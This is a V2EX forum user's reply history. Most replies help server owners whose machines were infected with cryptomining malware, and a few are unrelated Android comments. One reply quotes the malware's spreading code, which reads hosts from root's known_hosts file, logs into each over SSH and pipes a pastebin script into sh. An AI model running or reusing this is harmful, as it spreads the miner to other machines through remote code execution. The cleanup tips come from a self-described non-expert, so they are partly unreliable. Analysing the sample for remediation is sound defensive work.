V2EX › viruser 的所有回复 › 第 3 页 / 共 3 页

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

1 2 3

❮

❯

2019-06-21 15:43:28 +08:00

回复了 xiaotianhu 创建的主题 › 程序员 › 服务器被马了,求帮忙

还是 ddg 挖矿木马，可能内网机子由于其他原因感染了木马，然后木马爆破出 redis 密码进行了横向扩散。新木马和之前的相比，新木马尝试使用 drupal, Elasticsearch, Hadoop, redis, spring, sqlserver, ssh, thinkphp, weblogic 等服务的配置失误 /漏洞进行 RCE... ![Annotation 2019-06-21 153649.png]( https://i.loli.net/2019/06/21/5d0c892adfa7978592.png)

2019-04-06 09:42:24 +08:00

回复了 sdushn 创建的主题 › Android › lineageOS 好在哪里

@iwtbauh 刷 microg 代替 opengapps 来彻底支持开源✔

2019-03-20 15:37:58 +08:00

回复了 guanhui07 创建的主题 › Linux › 求助,服务器 crontab 被人异常加入挖矿脚本

我不是专业的人员，所以下面内容我也不知道有没有作用...这个软件总体原理和之前的几个挖矿软件类似，修改 crontab，修改 rm，拷贝挖矿本体，看看能不能用之前的脚本删除 crontab 里的内容，然后用 busybox rm 删除 /etc/pvds /etc/httpdz /etc/migrations 还有 /etc/init.d/ats，检查 chkconfig，最后检查下 /tmp 下的文件。最好在 /etc/hosts 里加上 127.0.0.1 w.3ei.xyz 127.0.0.1 w.21-3n.xyz 。

2019-03-20 15:07:34 +08:00

回复了 guanhui07 创建的主题 › Linux › 求助,服务器 crontab 被人异常加入挖矿脚本

草(日本语)，这玩意连 debug_info 都没删，那专杀脚本快出了，如果着急联系下搞安全的公司

2019-03-14 07:44:11 +08:00

回复了 chantan 创建的主题 › Android › Android Ｑ Beta 已放出

黑暗模式？

2019-02-22 01:18:04 +08:00

回复了 abcbuzhiming 创建的主题 › Linux › Linux 被入侵了该怎么整，入侵者摆明了不怕你知道

重点应该是这两句`if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh >/dev/null 2>&1 &' & done
fi`和下载后缀为.jpg 其实是 elf 的挖矿软件并重命名为 watchdogs

2018-08-07 11:05:51 +08:00

回复了 Love4Taylor 创建的主题 › Android › Android 9.0 Pie 正式版已释出

adb sideload 的提示里有说要先 Make sure that there is no pending OTA update，但是很多教程里都没提到这个，请问安装 P 的 ota 镜像是要先把之前安全补丁安装上吗？

2018-06-17 21:48:10 +08:00

回复了 kenvix 创建的主题 › 宽带症候群 › 路由器热点突然被不认识的客户端连接，难道我周围真的有人会利用 KRACK 吗？

@swim2sun 彩虹表了解一下

1 2 3

❮

❯